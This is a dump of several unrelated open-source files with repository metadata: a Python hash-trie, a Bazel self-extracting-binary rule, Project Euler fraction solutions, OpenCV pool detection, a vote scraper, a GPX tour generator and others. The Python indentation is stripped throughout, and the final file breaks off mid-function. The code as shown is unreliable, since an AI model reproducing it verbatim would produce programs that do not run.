MAXBITMAPDISPATCH = 16
def relevant(hsh, shift):
""" Return the relevant part of the hsh on the level shift. """
return hsh >> shift & BMAP
POPCOUNT_TBL = [0] * (2 ** 16)
for idx in xrange(2 ** 16):
POPCOUNT_TBL[idx] = (idx & 1) + POPCOUNT_TBL[idx >> 1]
def bit_count(v):
return (POPCOUNT_TBL[v & 0xffff] +
POPCOUNT_TBL[(v >> 16) & 0xffff])
def doc(docstring):
""" Decorator to set docstring of function to docstring. """
def deco(fn):
""" Implementation detail. """
fn.__doc__ = docstring
return fn
return deco
ASSOC = "\n".join([
"Add AssocNode node whose key's hash is hsh to the node or its children.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH. If a node with the same key already",
"exists, override it.",
])
IASSOC = "\n".join([
"Modify so that the AssocNode whose key's hash is hsh is added to it.",
"USE WITH CAUTION.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH. If a node with the same key already",
"exists, override it.",
])
GET = "\n".join([
"Get value of the AssocNode with key whose hash is hsh in the subtree.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
WITHOUT = "\n".join([
"Remove AssocNode with key whose hash is hsh from the subtree.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
IWITHOUT = "\n".join([
"Modify so that the AssocNode whose key's hash is hsh is removed from it.",
"USE WITH CAUTION.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
class Node(object):
__slots__ = []
def __and__(self, other):
new = NULLNODE
for node in other:
try:
self.get(hash(node.key), 0, node.key)
except KeyError:
pass
else:
new = new._iassoc(hash(node.key), 0, node)
return new
def __xor__(self, other):
new = self
for node in other:
new = new.xor(node.hsh, 0, node)
return new
def __or__(self, other):
new = self
for node in other:
new = new.assoc(node.hsh, 0, node)
return new
def __eq__(self, other):
return all(node == othernode for node, othernode in izip(self, other))
def __neq__(self, other):
return any(node != othernode for node, othernode in izip(self, other))
class NullNode(Node):
""" Dummy node being the leaf of branches that have no entries. """
__slots__ = []
def xor(self, hsh, shift, node):
return node
_ixor = xor
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# Because there currently no node, the new node
# is the node to be added.
return node
# The NullNode does not need to be modified if a new association is
# created because it only returns the new node, hence _iassoc = assoc.
_iassoc = assoc
def get(self, hsh, shift, key):
# There is no entry with the searched key because the hash leads
# to a branch ending in a NullNode.
raise KeyError(key)
@doc(WITHOUT)
def without(self, hsh, shift, key):
# There is no entry with the key to be removed because the hash leads
# to a branch ending in a NullNode.
raise KeyError(key)
_iwithout = without
def __iter__(self):
# There are no keys contained in a NullNode. Hence, an empty
# iterator is returned.
return iter([])
# Likewise, there are no values and items in a NullNode.
iteritems = itervalues = __iter__
def __copy__(self):
return self
def cutoff(self, hsh):
return self
# We only need one instance of a NullNode because it does not contain
# any data.
NULLNODE = NullNode()
class HashCollisionNode(Node):
""" If hashes of two keys collide, store them in a list and when a key
is searched, iterate over that list and find the appropriate key. """
__slots__ = ['children', 'hsh']
def __init__(self, nodes):
self.children = nodes
self.hsh = hash(nodes[0].hsh)
def xor(self, hsh, shift, node):
if not any(node.key == child.key for child in self.children):
return HashCollisionNode(self.children + [node])
return self
def _ixor(self, hsh, shift, node):
if not any(node.key == child.key for child in self.children):
self.children.append(node)
return self
@doc(GET)
def get(self, hsh, shift, key):
# To get the child we want we need to iterate over all possible ones.
# The contents of children are always AssocNodes,
# so we can safely access the key member.
for node in self.children:
if key == node.key:
return node
raise KeyError(key)
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# If we have yet another key with a colliding key, return a new node
# with it added to the children, otherwise return a DispatchNode.
if hsh == self.hsh:
return HashCollisionNode(self.children + [node])
return DispatchNode.make(shift, [self, node])
@doc(IASSOC)
def _iassoc(self, hsh, shift, node):
# If we have yet another key with a colliding key, add it to the
# children, otherwise return a DispatchNode.
if hsh == self.hsh:
self.children.append(node)
return self
return DispatchNode.make(shift, [self, node])
@doc(WITHOUT)
def without(self, hsh, shift, key):
# Remove the node whose key is key from the children. If it was the
# last child, return NULLNODE. If there was no member with a
# matching key, raise KeyError.
newchildren = [node for node in self.children if node.key != key]
if not newchildren:
return NULLNODE
if newchildren == self.children:
raise KeyError(key)
return HashCollisionNode(newchildren)
@doc(IWITHOUT)
def _iwithout(self, hsh, shift, key):
newchildren = [node for node in self.children if node.key != key]
if not newchildren:
return NULLNODE
if newchildren == self.children:
raise KeyError(key)
self.children = newchildren
return self
def __iter__(self):
for node in self.children:
for elem in node:
yield elem
def __copy__(self):
return HashCollisionNode(map(copy, self.children))
def cutoff(self, hsh):
if self.hsh <= hsh:
return NULLNODE
return self
class ListDispatch(Node):
""" Light weight dictionary like object for a little amount of items.
Only feasable for a little amount of items as a list of length nitems
is always stored.
Only accepts integers as keys. """
__slots__ = ['items']
def __init__(self, nitems=None, items=None):
if items is None:
items = [SENTINEL for _ in xrange(nitems)]
self.items = items
def replace(self, key, item):
""" Return a new ListDispatch with the the keyth item replaced
with item. """
return ListDispatch(
None,
self.items[:key] +
[item] +
self.items[key + 1:]
)
def _ireplace(self, key, item):
""" Replace keyth item with item.
USE WITH CAUTION. """
self.items[key] = item
return self
def __getitem__(self, key):
value = self.items[key]
if value is SENTINEL:
raise KeyError(key)
return value
def get(self, key, default):
""" Get keyth item. If it is not present, return default. """
value = self.items[key]
if value is not SENTINEL:
return value
return default
def remove(self, key):
""" Return new ListDispatch with keyth item removed.
Will not raise KeyError if it was not present. """
return self.replace(key, SENTINEL)
def _iremove(self, key):
""" Remove keyth item. Will not raise KeyError if it was not present.
USE WITH CAUTION. """
self._ireplace(key, SENTINEL)
return self
def to_bitmapdispatch(self):
dispatch = BitMapDispatch()
for key, value in enumerate(self.items):
if value is not SENTINEL:
dispatch._ireplace(key, value)
return dispatch
def __iter__(self):
return (item for item in self.items if item is not SENTINEL)
def __copy__(self):
return ListDispatch(items=self.items[:])
def __deepcopy__(self):
return ListDispatch(items=map(deepcopy, self.items))
def map(self, fn):
newitems = []
for elem in self.items:
if elem is not SENTINEL:
elem = fn(elem)
newitems.append(elem)
return ListDispatch(items=newitems)
class BitMapDispatch(Node):
""" Light weight dictionary like object for a little amount of items.
Best used for as most as many items as an integer has bits (usually 32).
Only accepts integers as keys.
The items are stored in a list and whenever an item is added, the bitmap
is ORed with (1 << key) so that the keyth bit is set.
The amount of set bits before the nth bit is used to find the index of the
item referred to by key in the items list.
"""
__slots__ = ['bitmap', 'items']
def __init__(self, bitmap=0, items=None):
if items is None:
items = []
self.bitmap = bitmap
self.items = items
def replace(self, key, item):
""" Return a new BitMapDispatch with the the keyth item replaced
with item. """
# If the item already existed in the list, we need to replace it.
# Otherwise, it will be added to the list at the appropriate
# position.
if len(self.items) >= MAXBITMAPDISPATCH:
new = self.to_listdispatch(BRANCH)
return new._ireplace(key, item)
notnew = bool(self.bitmap & 1 << key)
newmap = self.bitmap | 1 << key
idx = bit_count(self.bitmap & ((1 << key) - 1))
return BitMapDispatch(
newmap,
# If notnew is True, the item that is replaced by the new item
# is left out, otherwise the new item is inserted. Refer to
# _ireplace for a more concise explanation.
self.items[:idx] + [item] + self.items[idx+notnew:]
)
def _ireplace(self, key, item):
""" Replace keyth item with item.
USE WITH CAUTION. """
if len(self.items) >= MAXBITMAPDISPATCH:
new = self.to_listdispatch(BRANCH)
return new._ireplace(key, item)
notnew = bool(self.bitmap & 1 << key)
self.bitmap |= 1 << key
idx = bit_count(self.bitmap & ((1 << key) - 1))
if idx == len(self.items):
self.items.append(item)
elif notnew:
self.items[idx] = item
else:
self.items.insert(idx, item)
return self
def get(self, key, default=None):
""" Get keyth item. If it is not present, return default. """
if not self.bitmap & 1 << key:
return default
return self.items[bit_count(self.bitmap & ((1 << key) - 1))]
def remove(self, key):
""" Return new BitMapDispatch with keyth item removed.
Will not raise KeyError if it was not present. """
idx = bit_count(self.bitmap & ((1 << key) - 1))
return BitMapDispatch(
# Unset the keyth bit.
self.bitmap & ~(1 << key),
# Leave out the idxth item.
self.items[:idx] + self.items[idx+1:]
)
def _iremove(self, key):
""" Remove keyth item. Will not raise KeyError if it was not present.
USE WITH CAUTION. """
idx = bit_count(self.bitmap & ((1 << key) - 1))
self.bitmap &= ~(1 << key)
self.items.pop(idx)
return self
def __getitem__(self, key):
if not self.bitmap & 1 << key:
raise KeyError(key)
return self.items[bit_count(self.bitmap & ((1 << key) - 1))]
def to_listdispatch(self, nitems):
""" Return ListDispatch with the same key to value connections as this
BitMapDispatch. """
return ListDispatch(
None, [self.get(n, SENTINEL) for n in xrange(nitems)]
)
def __iter__(self):
return iter(self.items)
def __nonzero__(self):
return bool(self.items)
def __copy__(self):
return BitMapDispatch(self.bitmap, self.items[:])
def __deepcopy__(self):
return BitMapDispatch(self.bitmap, map(deepcopy, self.items))
def map(self, fn):
return BitMapDispatch(
self.bitmap,
[fn(elem) for elem in self.items]
)
class DispatchNode(Node):
""" Dispatch to children nodes depending of the hsh value at the
current level. """
__slots__ = ['children']
def __init__(self, children=None):
if children is None:
children = BitMapDispatch()
self.children = children
def xor(self, hsh, shift, node):
rlv = relevant(hsh, shift)
newchild = self.children.get(rlv, NULLNODE).xor(hsh, shift + SHIFT, node)
if newchild is NULLNODE:
# This makes sure no dead nodes remain in the tree after
# removing an item.
newchildren = self.children.remove(rlv)
if not newchildren:
return NULLNODE
else:
newchildren = self.children.replace(
rlv,
newchild
)
return DispatchNode(newchildren)
def _ixor(self, hsh, shift, node):
rlv = relevant(hsh, shift)
newchild = self.children[rlv].xor(hsh, shift + SHIFT, node)
if newchild is NULLNODE:
self.children = self.children._iremove(rlv)
if not self.children:
return NULLNODE
else:
self.children = self.children._ireplace(rlv, newchild)
return self
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# We need not check whether the return value of
# self.children.get(...).assoc is NULLNODE, because assoc never
# returns NULLNODE.
rlv = relevant(hsh, shift)
return DispatchNode(
self.children.replace(
rlv,
self.children.get(rlv, NULLNODE).assoc(
hsh, shift + SHIFT, node
)
)
)
@doc(IASSOC)
def _iassoc(self, hsh, shift, node):
rlv = relevant(hsh, shift)
self.children = self.children._ireplace(
rlv,
self.children.get(rlv, NULLNODE)._iassoc(hsh, shift + SHIFT, node)
)
return self
@classmethod
def make(cls, shift, many):
# Because the object we create in this function is not yet exposed
# to any other code, we may safely call _iassoc.
dsp = cls()
for elem in many:
dsp = dsp._iassoc(elem.hsh, shift, elem)
return dsp
@doc(GET)
def get(self, hsh, shift, key):
return self.children.get(relevant(hsh, shift), NULLNODE).get(
hsh, shift + SHIFT, key
)
@doc(WITHOUT)
def without(self, hsh, shift, key):
rlv = relevant(hsh, shift)
newchild = self.children[rlv].without(hsh, shift + SHIFT, key)
if newchild is NULLNODE:
# This makes sure no dead nodes remain in the tree after
# removing an item.
newchildren = self.children.remove(rlv)
if not newchildren:
return NULLNODE
else:
newchildren = self.children.replace(
rlv,
newchild
)
return DispatchNode(newchildren)
@doc(IWITHOUT)
def _iwithout(self, hsh, shift, key):
rlv = relevant(hsh, shift)
newchild = self.children[rlv]._iwithout(hsh, shift + SHIFT, key)
if newchild is NULLNODE:
self.children = self.children._iremove(rlv)
if not self.children:
return NULLNODE
else:
self.children = self.children._ireplace(rlv, newchild)
return self
def __iter__(self):
for child in self.children:
for elem in child:
yield elem
def __copy__(self):
return DispatchNode(self.children.map(copy))
|
fmayer/burrahobbit
|
burrahobbit/_tree.py
|
_tree.py
|
py
| 17,423
|
python
|
en
|
code
| 8
|
github-code
|
6
|
9162832850
|
def _self_extract_binary(ctx):
"""Implementation for the self_extract_binary rule."""
# This is a bit complex for stripping out timestamps
zip_artifact = ctx.actions.declare_file(ctx.label.name + ".zip")
touch_empty_files = [
"mkdir -p $(dirname ${tmpdir}/%s); touch ${tmpdir}/%s" % (f, f)
for f in ctx.attr.empty_files
]
cp_resources = [
("mkdir -p $(dirname ${tmpdir}/%s)\n" % r.short_path +
"cp %s ${tmpdir}/%s" % (r.path, r.short_path))
for r in ctx.files.resources
]
cp_flatten_resources = [
"cp %s ${tmpdir}/%s" % (r.path, r.basename)
for r in ctx.files.flatten_resources
]
ctx.actions.run_shell(
inputs = ctx.files.resources + ctx.files.flatten_resources,
outputs = [zip_artifact],
command = "\n".join([
"tmpdir=$(mktemp -d ${TMPDIR:-/tmp}/tmp.XXXXXXXX)",
"trap \"rm -fr ${tmpdir}\" EXIT",
] + touch_empty_files + cp_resources + cp_flatten_resources + [
"find ${tmpdir} -exec touch -t 198001010000.00 '{}' ';'",
"(d=${PWD}; cd ${tmpdir}; zip -rq ${d}/%s *)" % zip_artifact.path,
]),
mnemonic = "ZipBin",
)
ctx.actions.run_shell(
inputs = [ctx.file.launcher, zip_artifact],
outputs = [ctx.outputs.executable],
command = "\n".join([
"cat %s %s > %s" % (
ctx.file.launcher.path,
zip_artifact.path,
ctx.outputs.executable.path,
),
"zip -qA %s" % ctx.outputs.executable.path,
]),
mnemonic = "BuildSelfExtractable",
)
self_extract_binary = rule(
_self_extract_binary,
attrs = {
"launcher": attr.label(
mandatory = True,
allow_single_file = True,
),
"empty_files": attr.string_list(default = []),
"resources": attr.label_list(
default = [],
allow_files = True,
),
"flatten_resources": attr.label_list(
default = [],
allow_files = True,
),
},
executable = True,
)
|
bazelbuild/bazel
|
scripts/packages/self_extract_binary.bzl
|
self_extract_binary.bzl
|
bzl
| 2,138
|
python
|
en
|
code
| 21,632
|
github-code
|
6
|
26470959901
|
""" Problem 71: Ordered Fractions
https://projecteuler.net/problem=71
Goal: By listing the set of reduced proper fractions for d <= N in ascending
order of size, find the numerator and denominator of the fraction immediately to
the left of n/d.
Constraints: 1 <= n < d <= 1e9, gcd(n, d) == 1, d < N <= 1e15
Reduced Proper Fraction: A fraction n/d, where n & d are positive integers,
n < d, and gcd(n, d) == 1.
Farey Sequence: A sequence of completely reduced fractions, either between 0 and
1, or which when in reduced terms have denominators <= N, arranged in order of
increasing size. The sequence optionally begins with 0/1 and ends with 1/1 if
restricted. The middle term of a Farey sequence is always 1/2 for N > 1.
e.g. if d <= 8, the Farey sequence would be ->
1/8, 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5,
5/8, 2/3, 5/7, 3/4, 4/5, 5/6, 6/7, 7/8
e.g.: N = 8, n = 3, d = 7
ans = 2/5
"""
from fractions import Fraction
from math import gcd
def left_farey_neighbour(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution finds Farey sequence neighbours based on the following:
If a/b and n/d are neighbours, with a/b < n/d, then their difference:
n/d - a/b = (nb - ad)/(db)
with nb - ad = 1, it becomes ->
n/d - a/b = 1/(db)
A mediant fraction can be found between 2 neighbours using:
p/q = (a + n)/(b + d)
This solution could also be implemented similarly using a Stern-Brocot Tree
fraction search algorithm that uses binary search to recursively find the
target fraction n/d starting from the left & right ancestors, 0/1 & 1/0. Once
found, the last left boundary is used with the target to find all mediants
until a new mediant's denominator exceeds limit.
SPEED (WORSE)
12.03s for N = 1e7
SPEED (Impossible for N > 1e10)
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
upper_bound = Fraction(n, d)
lower_bound = Fraction(n, d + 1) if d != limit else Fraction(n - 1, d)
half = Fraction(1, 2)
if lower_bound < half < upper_bound:
lower_bound = half
neighbour = Fraction()
while True:
delta = upper_bound - lower_bound
neighbour_delta = Fraction(1, lower_bound.denominator * d)
if delta == neighbour_delta:
neighbour = lower_bound
lower_bound = Fraction(
lower_bound.numerator + n,
lower_bound.denominator + d
)
if lower_bound.denominator > limit and neighbour != Fraction():
break
return neighbour.numerator, neighbour.denominator
def compare_fractions(
fraction_a: tuple[int, int],
fraction_b: tuple[int, int]
) -> int:
"""
Rather than compare Doubles, whole numbers are compared based on the
property that:
if a/b < n/d, then ad < bn
:returns: -1 if fraction_a < fraction_b; 1 if fraction_a > fraction_b; 0 if
both equal.
"""
left = fraction_a[0] * fraction_b[1]
right = fraction_a[1] * fraction_b[0]
if left == right:
return 0
return -1 if left < right else 1
def reduce_fraction(numerator: int, denominator: int) -> tuple[int, int]:
divisor = gcd(numerator, denominator)
return numerator // divisor, denominator // divisor
def left_farey_neighbour_improved(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution improved based on the following:
For each denominator b up to N, the only fraction that needs to be considered
is the one with the largest numerator a for which a/b < n/d.
a/b < n/d becomes ad < bn, which means ad <= bn - 1
a <= floor((bn - 1)/d)
for b <= N, floor((bn - 1)/d)/b is the largest fraction.
Fractions with larger denominators are spaced more closely than those with
smaller denominators, so iterating backwards starting at N means the largest
neighbour below n/d will be found sooner. The loop is broken based on the
aforementioned property that:
the difference between 2 neighbours is given as 1/(db)
for a new fraction r/s to be closer to n/d than a/b ->
1/(ds) < (nb - da)/(db) -> s > b/(nb - da)
if delta = nb - da = 1, this means s > b, & the loop can be broken as all
denominators between b and N have already been examined.
N.B. Using the Fraction class from the fractions library is helpful as an
instance intrinsically reduces itself & comparisons & arithmetic operations
are more easily implemented; however, its use reduced the execution speed to
405.98s for N = 1e15, a ~4x reduction in performance.
SPEED (BETTER)
3.9e4ns for N = 1e7
SPEED (BETTER)
93.99s for N = 1e15
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
closest_neighbour = 0, 1
b = limit # current denominator starts at provided limit
min_b = 1
while b >= min_b:
a = (b * n - 1) // d # current numerator
current = a, b
# if closest_a / closest_b < current_a / current_b
if compare_fractions(closest_neighbour, current) == -1:
closest_neighbour = reduce_fraction(a, b)
delta = n * b - d * a
min_b = b // delta + 1
b -= 1
return closest_neighbour
def extended_gcd(n1: int, n2: int) -> tuple[int, int, int]:
"""
Implements the Extended Euclidean Algorithm that calculates, in addition to
gcd(n1, n2), the coefficients of Bezout's identity, integers x and y
such that:
ax + by = gcd(a, b)
:returns: Tuple of (gcd, x, y).
:raises ValueError: If either n1 or n2 is less than 0.
"""
if n1 < 0 or n2 < 0:
raise ValueError("Integers should not be negative")
if n1 == 0:
return n2, 0, 1
e_gcd, x, y = extended_gcd(n2 % n1, n1)
return e_gcd, y - n2 // n1 * x, x
def left_farey_neighbour_optimised(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution optimised by taking advantage of the Extended Euclidean Algorithm
that generates coefficients x and y, in addition to the gcd.
When a and b are co-prime, x will be the modular multiplicative inverse of
a % b and y will be the modular multiplicative inverse of b % a. Remember
that the modular multiplicative inverse of an integer a is an integer x such
that the product ax is congruent to 1 with respect to the modulus b.
SPEED (BEST)
5700ns for N = 1e7
SPEED (BEST)
1.9e4ns for N = 1e15
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
# Python modulus intrinsically handles cases when x is negative
mod_inverse_of_n = extended_gcd(n, d)[1] % d
new_d = limit % d - mod_inverse_of_n
if new_d < 0:
new_d += d
neighbour_denom = limit - new_d
neighbour_num = (neighbour_denom * n - 1) // d
return neighbour_num, neighbour_denom
|
bog-walk/project-euler-python
|
solution/batch7/problem71.py
|
problem71.py
|
py
| 7,025
|
python
|
en
|
code
| 0
|
github-code
|
6
|
24455754580
|
# -*- coding: utf-8 -*-
"""
@author: Fatih Kemal Terzi
"""
import cv2
import numpy as np
# Image reading
img = cv2.imread('pools.png')
count=0
# Image converting to HSV color space
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# Adjusting range of blue color for detecting pools
lower_blue = np.array([80,50,50])
upper_blue = np.array([115,255,255])
# To spesifiying blue region creating binary mask
mask = cv2.inRange(hsv, lower_blue, upper_blue)
# Perform morphological operations to reduce noise
kernel = np.ones((5,5),np.uint8)
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
# Find contours of blue regions
contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# Draw bounding boxes around the blue regions
for cnt in contours:
x, y, w, h = cv2.boundingRect(cnt)
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
count+=1
# Display the result
cv2.imshow('Detected_pools', img)
print('Number of pools : ',count)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
FatihKemalTerzi/Image-Processing
|
Midterm3.py
|
Midterm3.py
|
py
| 1,105
|
python
|
en
|
code
| 0
|
github-code
|
6
|
10502033252
|
# https://www.geeksforgeeks.org/find-the-smallest-positive-number-missing-from-an-unsorted-array/
def missing(res):
N = len(res)
for i in range(0, N):
if res[i] < N and res[i] > 0:
res[res[i]-1] = -res[res[i]-1]
# print(res)
for i in range(0, N):
if res[i] > 0:
return i+1
if __name__ == '__main__':
arr = [1, 2, 3, 7, 6, 8, -1, -10, 15]
res = []
for item in arr:
if item >= 0:
res.append(item)
print(res)
print(missing(res))
|
anojkr/help
|
Array/smallest_missing_number_in_unsorted_array.py
|
smallest_missing_number_in_unsorted_array.py
|
py
| 455
|
python
|
en
|
code
| 0
|
github-code
|
6
|
3739410797
|
import requests
from bs4 import BeautifulSoup
import re
def get_vote_links(current_page):
"""Finds the vote page links on the main folktingspage.
Args:
main_page_soup (_type_): Takes in the main page with all the vote subpages as a soap object
Returns:
_type_: Returns a list of soap Objects with the links to the respective subpages
"""
prefix = 'https://www.ft.dk/'
a = current_page.find_all(attrs={'class':'column-documents__link'})
a = [prefix+x['href'] for x in a]
return a
def get_soup_page(url_page):
"""Converts URL into a BeautifulSoup object.
Args:
url_page (_type_): takes a URL page as input parsed as a string.
Returns:
_type_: returns a BeautifulSoup object.
"""
response = requests.get(url_page)
page = BeautifulSoup(response.content, 'html.parser')
return page
def get_votes_by_party(vote_page) -> dict:
""" Takes a BeautifulSoup object and retrieves the votes by party
section, then strips it and modifies it so that it is returned in a fixed sized
dictionary containing parties, For, Against, Neutral counts.
Args:
vote_page (_type_): URL for the folketings vote_page
(e.g., https://www.ft.dk/samling/20042/afstemning/64.htm)
Returns:
dict: fixed sized dictionary containing parties, For, Against, Neutral, absent counts for each party
"""
table = vote_page.find("div", {"id":"tingdok_accordion_vote-2"})
dict = {'parties': [], 'For': [], 'Against':[], 'Neutral':[], 'Absent':[]}
regex_party = re.compile(r"\w* \(\w+\)")
regex_vote_num = re.compile(r"\d+")
for child in table.table.tbody.children:
if re.search(regex_party, child.text.strip()):
lst = child.text.strip().split("\r\n")
votes = []
for i in lst:
i = i.strip()
if re.search(regex_party,i):
party = i
dict['parties'].append(party)
elif re.search(regex_vote_num, i):
votes.append(i)
dict['For'].append(votes[0])
dict['Against'].append(votes[1])
dict['Neutral'].append(votes[2])
dict['Absent'].append(votes[3])
return dict
def get_votes(vote_page):
vote_section = vote_page.find("div", {"id": "tingdok_accordion_vote-3"})
votes = {
'politician': [],
'party': [],
'vote': []
}
for child in vote_section.tbody.children:
lst = child.text.strip().split("\n\r")
if len(lst) == 3:
person, party, vote = [x.strip() for x in lst]
votes['politician'].append(person)
votes['party'].append(party)
votes['vote'].append(vote)
return votes
def get_description_page(vote_page):
description_link = vote_page.find("a", {"class":"tingdok-backarrow"})
prefix = 'https://www.ft.dk/'
response = requests.get(prefix + description_link['href'])
description_page = BeautifulSoup(response.content, 'html.parser')
return description_page
def get_vote_info(description_page):
description_texts = description_page.find('div', {"class":"tingdok__caseinfospot-a__container"}).text.strip().splitlines()
info = []
for line in description_texts:
if line.strip() != "":
info.append(line.strip())
return info
def get_vote_id(vote_page):
return vote_page.h2.text
def get_title(description_page):
top_header = description_page.find("div", {"class":"tingdok__caseinfotopspot-a__container"})
return top_header.h1.text.strip()
def get_vote_caller(description_page):
top_header = description_page.find("div", {"class":"tingdok__caseinfotopspot-a__container"})
hosts_section = top_header.find("div", {"class":"tingdok-normal"})
meeting_hosts = []
for line in hosts_section:
clean_line = line.text.strip()
if len(clean_line)>5:
meeting_hosts.append(clean_line)
return meeting_hosts
def get_next_page(current_page):
next_page_url = current_page.find("a", {"title":"Nรฆste"})['href']
prefix = "https://www.ft.dk/dokumenter/dokumentlister/afstemninger"
np_response = requests.get(prefix + next_page_url)
return BeautifulSoup(np_response.content, 'html.parser')
def exists_next_page(current_page):
if current_page.find("a", {"title":"Nรฆste"})['href'] != None:
return True
else:
False
|
jonahank/Vote-Prediction-Model
|
utils/scraper_functions.py
|
scraper_functions.py
|
py
| 4,617
|
python
|
en
|
code
| 1
|
github-code
|
6
|
10138194613
|
from eth_keys.datatypes import (
PrivateKey,
PublicKey,
Signature,
)
class BaseECCBackend(object):
def __init__(self):
self.PublicKey = type(
'{0}PublicKey'.format(type(self).__name__),
(PublicKey,),
{'_backend': self},
)
self.PrivateKey = type(
'{0}PrivateKey'.format(type(self).__name__),
(PrivateKey,),
{'_backend': self},
)
self.Signature = type(
'{0}Signature'.format(type(self).__name__),
(Signature,),
{'_backend': self},
)
def ecdsa_sign(self, msg_hash, private_key):
raise NotImplementedError()
def ecdsa_verify(self, msg_hash, signature, public_key):
return self.ecdsa_recover(msg_hash, signature) == public_key
def ecdsa_recover(self, msg_hash, signature):
raise NotImplementedError()
def private_key_to_public_key(self, private_key):
raise NotImplementedError()
|
adithyabsk/loanchain
|
loanchain/lib/python2.7/site-packages/eth_keys/backends/base.py
|
base.py
|
py
| 1,000
|
python
|
en
|
code
| 5
|
github-code
|
6
|
75131970108
|
import requests
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"}
"ไผ ๅ
ฅๅๆฐ็ๅฝขๅผ"
params = {"wd":"haha"}
"ๆๅ้ข็้ฎๅทๅฏๅ ๅฏไธๅ ๏ผไธๅ ็่ฏ๏ผ็จๅบไผ่ชๅจๅธฎไฝ ๅ ไธ"
url_temp = "https://www.baidu.com/?"
"ๆณจๆ็จrequests่ฐ็จpostๅgetๆถ็ๅฝๆฐ"
r = requests.get(url_temp, headers=headers, params=params)
print(r.status_code) # ่ทๅ่ฏทๆฑๅพๅฐ็็ฝ้กต็็ถๆ
print(r.request.url) # ่ทๅๆไปฌ่ฏทๆฑๅพๅฐ็็ฝ้กต็ฝๅ
"ไธ้ข่ฟไธชๆดๅ ็ฎๆด"
".format็จ่ตทๆฅๅ%sๆๆๆฏไธๆ ท็"
url_2 = "https://www.baidu.com/?wd={}".format("haha")
r = requests.get(url_2, headers=headers)
print(r.status_code) # ่ทๅ่ฏทๆฑๅพๅฐ็็ฝ้กต็็ถๆ
print(r.request.url) # ่ทๅๆไปฌ่ฏทๆฑๅพๅฐ็็ฝ้กต็ฝๅ
|
hahahei957/NewProject_Opencv2
|
venv_2/็ฌ่ซ/01_HelloWorld.py
|
01_HelloWorld.py
|
py
| 874
|
python
|
zh
|
code
| 0
|
github-code
|
6
|
9512772188
|
import sys
import pandas as pd
import numpy as np
import xml.dom.minidom
#from exercise 3
def output_gpx(points, output_filename):
"""
Output a GPX file with latitude and longitude from the points DataFrame.
"""
def append_trkpt(pt, trkseg, doc):
trkpt = doc.createElement('trkpt')
trkpt.setAttribute('lat', '%.8f' % (pt['lat']))
trkpt.setAttribute('lon', '%.8f' % (pt['lon']))
trkseg.appendChild(trkpt)
doc = xml.dom.minidom.getDOMImplementation().createDocument(None, 'gpx', None)
trk = doc.createElement('trk')
doc.documentElement.appendChild(trk)
trkseg = doc.createElement('trkseg')
trk.appendChild(trkseg)
points.apply(append_trkpt, axis=1, trkseg=trkseg, doc=doc)
with open(output_filename, 'w') as fh:
doc.writexml(fh, indent=' ')
def main(input_file):
culture_tour = pd.read_csv('culture_tour.csv')
dessert_tour = pd.read_csv('dessert_tour.csv')
pub_crawl = pd.read_csv('pub_crawl.csv')
scenic_tour = pd.read_csv('scenic_tour.csv')
lodging_df = pd.read_csv(input_file)
lodging_coordinates_df = lodging_df[['lat', 'lon']]
output_gpx(lodging_coordinates_df, 'lodging.gpx')
culture_interest = lodging_df['culture'].values[0]
dessert_interest = lodging_df['dessert'].values[0]
drinks_interest = lodging_df['drinks'].values[0]
scenic_interest = lodging_df['scenic'].values[0]
if (culture_interest == 'y'):
culture_tour_subset_df = culture_tour[['lat', 'lon']]
culture_tour_subset_df = culture_tour_subset_df.append(culture_tour_subset_df.iloc[0])
output_gpx(culture_tour_subset_df, 'culture.gpx')
if (dessert_interest == 'y'):
dessert_tour_subset_df = dessert_tour[['lat', 'lon']]
dessert_tour_subset_df = dessert_tour_subset_df.append(dessert_tour_subset_df.iloc[0])
output_gpx(dessert_tour_subset_df, 'desserts.gpx')
if (drinks_interest == 'y'):
pub_crawl_subset_df = pub_crawl[['lat', 'lon']]
pub_crawl_subset_df = pub_crawl_subset_df.append(pub_crawl_subset_df.iloc[0])
output_gpx(pub_crawl_subset_df, 'drinks.gpx')
if (scenic_interest == 'y'):
scenic_tour_subset_df = scenic_tour[['lat', 'lon']]
scenic_tour_subset_df = scenic_tour_subset_df.append(scenic_tour_subset_df.iloc[0])
output_gpx(scenic_tour_subset_df, 'scenic.gpx')
if __name__ == '__main__':
input_file = sys.argv[1]
main(input_file)
|
tomchiu19/tourPlanner
|
code/05-generate-gpx.py
|
05-generate-gpx.py
|
py
| 2,464
|
python
|
en
|
code
| 0
|
github-code
|
6
|
24254182121
|
import time
import requester
import json
import config
location_id_data = {}
exclude_ids = config.settings["loc_ids_to_exclude"] # Gananoque & Tay Valley Old People One & Prescott
def parseLocationsToDict():
# Locations.json is extracted from the bottom of the pomelo covid-vaccination "locations" html page where you select a spot.
# Kinda stupid so I just extracted it and then saved it as a json.
with open("data/locations.json", encoding="utf-8") as data_file:
location_data = json.loads(data_file.read())["locations"]
for location in location_data:
loc_id = location["loc_id"]
location_id_data[loc_id] = location
def locAddyToAddress(data):
address = data["address"].strip()
# address2 = data["address2"].strip()
